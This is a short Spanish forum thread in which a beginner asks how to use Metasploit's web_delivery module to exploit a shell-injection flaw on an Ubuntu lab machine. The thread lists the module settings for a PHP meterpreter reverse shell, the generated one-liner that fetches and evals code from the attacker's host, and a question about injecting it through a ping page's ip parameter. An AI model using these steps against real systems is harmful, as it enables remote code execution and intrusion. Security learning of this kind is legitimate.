Escalada de privilegios con WEB_DELIVERY

Iniciado por Gsusseppe84, 10 Septiembre 2018, 14:20 PM

0 Miembros y 1 Visitante están viendo este tema.

Gsusseppe84

Buenos días,
Tengo que hacer una escalada de privilegios de una máquina virtual basada en Ubuntu.
Detecto a través de la herramienta VEGA, que existe 1 vulnerabilidad crítica "Shell Injection" y para explotar la misma, me obligan a realizarlo a través del módulo web_delivery de metaesploit, por tanto, procedo a los siguientes pasos:

Use exploit/multi/script/web_delivery
Msf exploit (web_delivery)>set lhost 192.168.1.132

(entiendo que aquí es donde pongo la ip de la máquina donde tengo alojado Kali Linux, sin embargo, en ningún momento estoy metiendo la IP de la máquina donde tengo que hacer la escalada de privilegios, que sería Rhost si no me equivoco)
Msf exploit (web_delivery)>set lport 4444
Msf exploit (web_delivery)>set target 1
Msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

(entiendo que elijo PHP ya que es Ubuntu donde se encuentra la máquina a atacar)
Msf exploit (web_delivery)>run

Obtengo el siguiente código malicioso php, sin embargo, no sé dónde ejecutarlo en la máquina de la víctima.
Php –d allow_url_fopen=true –r "eval(file_get_contents(´http://192.168.1.132:8080/qH0s5l2UGvbKap'));"
¿lo pongo seguido a la url? http://192.168.1.132/ping/index.php?ip=
Estoy empezando en esto y soy muy torpe.
Gracias de antemano.


Shell Root

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Gsusseppe84

gracias por el enlace. Este ya lo había leído, sin embargo no me aclara mucho la verdad. que rabia